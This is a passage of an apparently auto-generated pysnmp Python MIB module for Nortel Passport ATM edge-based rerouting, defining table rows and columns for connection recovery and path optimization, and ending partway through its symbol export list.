mscAtmIfVptVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvIndex.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20), )
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVptVccSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvProvEntry.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVptVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12))
mscAtmIfVptVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1), )
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 1), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVptVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVptVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoIndex.setStatus('mandatory')
mscAtmIfVptVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30), )
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVptVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVptVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoConnectionRecovered.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40), )
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoTotalPathOptimizations.setStatus('mandatory')
mscAtmIfPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7))
mscAtmIfPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatus.setStatus('mandatory')
mscAtmIfPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrComponentName.setStatus('mandatory')
mscAtmIfPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrStorageType.setStatus('mandatory')
mscAtmIfPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfPnniEbrIndex.setStatus('mandatory')
mscAtmIfPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfPnniEbrProvTable.setStatus('mandatory')
mscAtmIfPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfPnniEbrProvEntry.setStatus('mandatory')
mscAtmIfPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfPnniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfPnniEbrPathOptimization.setStatus('mandatory')
mscAtmIfPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfPnniEbrOperTable.setStatus('mandatory')
mscAtmIfPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfPnniEbrOperEntry.setStatus('mandatory')
mscAtmIfPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfPnniEbrStatsTable.setStatus('mandatory')
mscAtmIfPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfPnniEbrStatsEntry.setStatus('mandatory')
mscAtmIfPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrTotalPathOptimizations.setStatus('mandatory')
atmEbrGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1))
atmEbrGroupCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1))
atmEbrGroupCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1, 3))
atmEbrGroupCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1, 3, 2))
atmEbrCapabilities = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3))
atmEbrCapabilitiesCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3, 1))
atmEbrCapabilitiesCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3, 1, 3))
atmEbrCapabilitiesCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3, 1, 3, 2))
mibBuilder.exportSymbols("Nortel-MsCarrier-MscPassport-AtmEbrMIB", mscAtmIfVptPnniEbr=mscAtmIfVptPnniEbr, atmEbrGroupCA=atmEbrGroupCA, mscAtmIfUniEbrTotalConnectionRecoveries=mscAtmIfUniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrComponentName=mscAtmIfPnniEbrComponentName, mscAtmIfVptPnniEbrProvEntry=mscAtmIfVptPnniEbrProvEntry, mscAtmIfVptVccEbrInfoTotalPathOptimizations=mscAtmIfVptVccEbrInfoTotalPathOptimizations, mscAtmIfIispEbrOperTable=mscAtmIfIispEbrOperTable, mscAtmIfPnniEbrStatsTable=mscAtmIfPnniEbrStatsTable, atmEbrGroup=atmEbrGroup, mscAtmIfUniEbrConnectionRecovery=mscAtmIfUniEbrConnectionRecovery, mscAtmIfVptIispEbrOperEntry=mscAtmIfVptIispEbrOperEntry, mscAtmIfVptUniEbrTotalPathOptimizations=mscAtmIfVptUniEbrTotalPathOptimizations, mscAtmIfVptVccSrcEbrOvIndex=mscAtmIfVptVccSrcEbrOvIndex, mscAtmIfUniEbr=mscAtmIfUniEbr, mscAtmIfVptUniEbrPathOptimization=mscAtmIfVptUniEbrPathOptimization, mscAtmIfUniEbrStatsEntry=mscAtmIfUniEbrStatsEntry, mscAtmIfVpcEbrInfoStorageType=mscAtmIfVpcEbrInfoStorageType, mscAtmIfVptIispEbrRowStatus=mscAtmIfVptIispEbrRowStatus, mscAtmIfPnniEbrProvTable=mscAtmIfPnniEbrProvTable, mscAtmIfVptPnniEbrSubscribedConnections=mscAtmIfVptPnniEbrSubscribedConnections, mscAtmIfVccEbrInfoTotalPathOptimizations=mscAtmIfVccEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbrStatsTable=mscAtmIfVptIispEbrStatsTable, mscAtmIfVptUniEbrProvEntry=mscAtmIfVptUniEbrProvEntry, mscAtmIfVptPnniEbrEligibleRecoveredConnections=mscAtmIfVptPnniEbrEligibleRecoveredConnections, mscAtmIfVccEbrInfoComponentName=mscAtmIfVccEbrInfoComponentName, mscAtmIfVccSrcEbrOvRowStatusEntry=mscAtmIfVccSrcEbrOvRowStatusEntry, mscAtmIfPnniEbrIndex=mscAtmIfPnniEbrIndex, mscAtmIfVpcSrcEbrOvStorageType=mscAtmIfVpcSrcEbrOvStorageType, mscAtmIfIispEbrRowStatusTable=mscAtmIfIispEbrRowStatusTable, mscAtmIfVptPnniEbrPathOptimization=mscAtmIfVptPnniEbrPathOptimization, mscAtmIfIispEbrProvEntry=mscAtmIfIispEbrProvEntry, mscAtmIfVccEbrInfoRowStatusEntry=mscAtmIfVccEbrInfoRowStatusEntry, mscAtmIfVptIispEbrStorageType=mscAtmIfVptIispEbrStorageType, mscAtmIfVptPnniEbrStatsEntry=mscAtmIfVptPnniEbrStatsEntry, mscAtmIfVptVccEbrInfoIndex=mscAtmIfVptVccEbrInfoIndex, mscAtmIfPnniEbrTotalConnectionRecoveries=mscAtmIfPnniEbrTotalConnectionRecoveries, mscAtmIfVptVccEbrInfoOperTable=mscAtmIfVptVccEbrInfoOperTable, mscAtmIfPnniEbrEligibleRecoveredConnections=mscAtmIfPnniEbrEligibleRecoveredConnections, mscAtmIfVpcEbrInfoRecoverySubscribed=mscAtmIfVpcEbrInfoRecoverySubscribed, mscAtmIfVptVccSrcEbrOvProvTable=mscAtmIfVptVccSrcEbrOvProvTable, mscAtmIfVptVccEbrInfoConnectionRecovered=mscAtmIfVptVccEbrInfoConnectionRecovered, mscAtmIfVptIispEbrComponentName=mscAtmIfVptIispEbrComponentName, mscAtmIfVptUniEbrComponentName=mscAtmIfVptUniEbrComponentName, mscAtmIfVptVccEbrInfoRowStatusEntry=mscAtmIfVptVccEbrInfoRowStatusEntry, mscAtmIfIispEbrComponentName=mscAtmIfIispEbrComponentName, mscAtmIfPnniEbrOperEntry=mscAtmIfPnniEbrOperEntry, mscAtmIfVptIispEbrTotalPathOptimizations=mscAtmIfVptIispEbrTotalPathOptimizations, mscAtmIfVccEbrInfo=mscAtmIfVccEbrInfo, mscAtmIfVptUniEbrIndex=mscAtmIfVptUniEbrIndex, mscAtmIfVptUniEbrIneligibleRecoveredConnections=mscAtmIfVptUniEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02=atmEbrCapabilitiesCA02, mscAtmIfVptUniEbrRowStatusTable=mscAtmIfVptUniEbrRowStatusTable, mscAtmIfVptVccEbrInfoRowStatusTable=mscAtmIfVptVccEbrInfoRowStatusTable, mscAtmIfVptIispEbrProvTable=mscAtmIfVptIispEbrProvTable, mscAtmIfVpcSrcEbrOvOptimizationSubscribed=mscAtmIfVpcSrcEbrOvOptimizationSubscribed, mscAtmIfIispEbrTotalPathOptimizations=mscAtmIfIispEbrTotalPathOptimizations, mscAtmIfVccSrcEbrOvComponentName=mscAtmIfVccSrcEbrOvComponentName, mscAtmIfVccSrcEbrOvOptimizationSubscribed=mscAtmIfVccSrcEbrOvOptimizationSubscribed, mscAtmIfUniEbrOperTable=mscAtmIfUniEbrOperTable, mscAtmIfIispEbrStorageType=mscAtmIfIispEbrStorageType, mscAtmIfVptVccSrcEbrOv=mscAtmIfVptVccSrcEbrOv, mscAtmIfIispEbrStatsTable=mscAtmIfIispEbrStatsTable, mscAtmIfUniEbrSubscribedConnections=mscAtmIfUniEbrSubscribedConnections, mscAtmIfUniEbrRowStatusTable=mscAtmIfUniEbrRowStatusTable, mscAtmIfIispEbrStatsEntry=mscAtmIfIispEbrStatsEntry, mscAtmIfVptVccEbrInfoOperEntry=mscAtmIfVptVccEbrInfoOperEntry, mscAtmIfIispEbrRowStatusEntry=mscAtmIfIispEbrRowStatusEntry, mscAtmIfVptIispEbrIneligibleRecoveredConnections=mscAtmIfVptIispEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02A=atmEbrCapabilitiesCA02A, mscAtmIfVptVccEbrInfoOptimizationSubscribed=mscAtmIfVptVccEbrInfoOptimizationSubscribed, mscAtmIfVccEbrInfoIndex=mscAtmIfVccEbrInfoIndex, mscAtmIfIispEbrPathOptimization=mscAtmIfIispEbrPathOptimization, mscAtmIfPnniEbrRowStatusEntry=mscAtmIfPnniEbrRowStatusEntry, mscAtmIfVptIispEbrSubscribedConnections=mscAtmIfVptIispEbrSubscribedConnections, mscAtmIfUniEbrStatsTable=mscAtmIfUniEbrStatsTable, mscAtmIfVptUniEbrStatsTable=mscAtmIfVptUniEbrStatsTable, mscAtmIfVptPnniEbrRowStatus=mscAtmIfVptPnniEbrRowStatus, mscAtmIfVptUniEbrProvTable=mscAtmIfVptUniEbrProvTable, mscAtmIfVptUniEbrOperEntry=mscAtmIfVptUniEbrOperEntry, mscAtmIfVccEbrInfoRecoverySubscribed=mscAtmIfVccEbrInfoRecoverySubscribed, mscAtmIfVpcEbrInfo=mscAtmIfVpcEbrInfo, mscAtmIfPnniEbrIneligibleRecoveredConnections=mscAtmIfPnniEbrIneligibleRecoveredConnections, mscAtmIfVpcSrcEbrOvRowStatusTable=mscAtmIfVpcSrcEbrOvRowStatusTable, mscAtmIfVptPnniEbrIneligibleRecoveredConnections=mscAtmIfVptPnniEbrIneligibleRecoveredConnections, mscAtmIfVpcEbrInfoConnectionRecovered=mscAtmIfVpcEbrInfoConnectionRecovered, mscAtmIfVccSrcEbrOvProvTable=mscAtmIfVccSrcEbrOvProvTable, mscAtmIfVccEbrInfoRowStatusTable=mscAtmIfVccEbrInfoRowStatusTable, mscAtmIfVccEbrInfoStorageType=mscAtmIfVccEbrInfoStorageType, mscAtmIfVpcEbrInfoTotalPathOptimizations=mscAtmIfVpcEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbr=mscAtmIfVptIispEbr, mscAtmIfVpcEbrInfoRowStatus=mscAtmIfVpcEbrInfoRowStatus, mscAtmIfVccSrcEbrOvRowStatusTable=mscAtmIfVccSrcEbrOvRowStatusTable, mscAtmIfIispEbrConnectionRecovery=mscAtmIfIispEbrConnectionRecovery, mscAtmIfVccSrcEbrOvProvEntry=mscAtmIfVccSrcEbrOvProvEntry, mscAtmIfUniEbrIndex=mscAtmIfUniEbrIndex, mscAtmIfVptUniEbrTotalConnectionRecoveries=mscAtmIfVptUniEbrTotalConnectionRecoveries, mscAtmIfVpcEbrInfoTotalConnectionRecoveries=mscAtmIfVpcEbrInfoTotalConnectionRecoveries, mscAtmIfVptVccSrcEbrOvRowStatusEntry=mscAtmIfVptVccSrcEbrOvRowStatusEntry, mscAtmIfIispEbrTotalConnectionRecoveries=mscAtmIfIispEbrTotalConnectionRecoveries, mscAtmIfIispEbrRowStatus=mscAtmIfIispEbrRowStatus, mscAtmIfVpcSrcEbrOvProvTable=mscAtmIfVpcSrcEbrOvProvTable, mscAtmIfVptUniEbrRowStatus=mscAtmIfVptUniEbrRowStatus, mscAtmIfPnniEbrRowStatusTable=mscAtmIfPnniEbrRowStatusTable, mscAtmIfPnniEbrStatsEntry=mscAtmIfPnniEbrStatsEntry, mscAtmIfVpcSrcEbrOvIndex=mscAtmIfVpcSrcEbrOvIndex, mscAtmIfVpcEbrInfoComponentName=mscAtmIfVpcEbrInfoComponentName, mscAtmIfVptIispEbrPathOptimization=mscAtmIfVptIispEbrPathOptimization, mscAtmIfVpcSrcEbrOvRowStatus=mscAtmIfVpcSrcEbrOvRowStatus, mscAtmIfVpcEbrInfoRowStatusEntry=mscAtmIfVpcEbrInfoRowStatusEntry, mscAtmIfVptPnniEbrOperEntry=mscAtmIfVptPnniEbrOperEntry, mscAtmIfIispEbrSubscribedConnections=mscAtmIfIispEbrSubscribedConnections, mscAtmIfVccSrcEbrOv=mscAtmIfVccSrcEbrOv, mscAtmIfVptIispEbrEligibleRecoveredConnections=mscAtmIfVptIispEbrEligibleRecoveredConnections, mscAtmIfUniEbrProvEntry=mscAtmIfUniEbrProvEntry, mscAtmIfVpcEbrInfoRowStatusTable=mscAtmIfVpcEbrInfoRowStatusTable, mscAtmIfVptPnniEbrComponentName=mscAtmIfVptPnniEbrComponentName, mscAtmIfVptPnniEbrConnectionRecovery=mscAtmIfVptPnniEbrConnectionRecovery, mscAtmIfVptVccSrcEbrOvRowStatus=mscAtmIfVptVccSrcEbrOvRowStatus, mscAtmIfVptIispEbrRowStatusTable=mscAtmIfVptIispEbrRowStatusTable, mscAtmIfVptPnniEbrStorageType=mscAtmIfVptPnniEbrStorageType, mscAtmIfVptVccEbrInfoStorageType=mscAtmIfVptVccEbrInfoStorageType, mscAtmIfIispEbr=mscAtmIfIispEbr, mscAtmIfVccEbrInfoOperEntry=mscAtmIfVccEbrInfoOperEntry, mscAtmIfVptPnniEbrTotalConnectionRecoveries=mscAtmIfVptPnniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrRowStatus=mscAtmIfPnniEbrRowStatus, mscAtmIfVpcSrcEbrOvProvEntry=mscAtmIfVpcSrcEbrOvProvEntry, mscAtmIfVccEbrInfoRowStatus=mscAtmIfVccEbrInfoRowStatus, mscAtmIfVptIispEbrIndex=mscAtmIfVptIispEbrIndex, mscAtmIfVpcEbrInfoOperEntry=mscAtmIfVpcEbrInfoOperEntry, mscAtmIfVptIispEbrOperTable=mscAtmIfVptIispEbrOperTable, mscAtmIfUniEbrProvTable=mscAtmIfUniEbrProvTable, mscAtmIfPnniEbrPathOptimization=mscAtmIfPnniEbrPathOptimization, mscAtmIfVpcEbrInfoStatsTable=mscAtmIfVpcEbrInfoStatsTable, mscAtmIfVccSrcEbrOvIndex=mscAtmIfVccSrcEbrOvIndex, mscAtmIfPnniEbrSubscribedConnections=mscAtmIfPnniEbrSubscribedConnections, mscAtmIfVptIispEbrRowStatusEntry=mscAtmIfVptIispEbrRowStatusEntry, mscAtmIfIispEbrProvTable=mscAtmIfIispEbrProvTable, mscAtmIfVptVccSrcEbrOvComponentName=mscAtmIfVptVccSrcEbrOvComponentName, mscAtmIfVptUniEbrConnectionRecovery=mscAtmIfVptUniEbrConnectionRecovery, mscAtmIfVccSrcEbrOvStorageType=mscAtmIfVccSrcEbrOvStorageType, mscAtmIfVpcSrcEbrOv=mscAtmIfVpcSrcEbrOv, mscAtmIfVptPnniEbrRowStatusTable=mscAtmIfVptPnniEbrRowStatusTable, mscAtmIfUniEbrEligibleRecoveredConnections=mscAtmIfUniEbrEligibleRecoveredConnections, mscAtmIfVptUniEbrRowStatusEntry=mscAtmIfVptUniEbrRowStatusEntry, mscAtmIfVccSrcEbrOvRowStatus=mscAtmIfVccSrcEbrOvRowStatus, mscAtmIfIispEbrEligibleRecoveredConnections=mscAtmIfIispEbrEligibleRecoveredConnections, mscAtmIfPnniEbrOperTable=mscAtmIfPnniEbrOperTable, mscAtmIfVpcEbrInfoOperTable=mscAtmIfVpcEbrInfoOperTable, mscAtmIfVpcEbrInfoStatsEntry=mscAtmIfVpcEbrInfoStatsEntry, mscAtmIfVptUniEbrStorageType=mscAtmIfVptUniEbrStorageType, mscAtmIfVccEbrInfoStatsTable=mscAtmIfVccEbrInfoStatsTable, 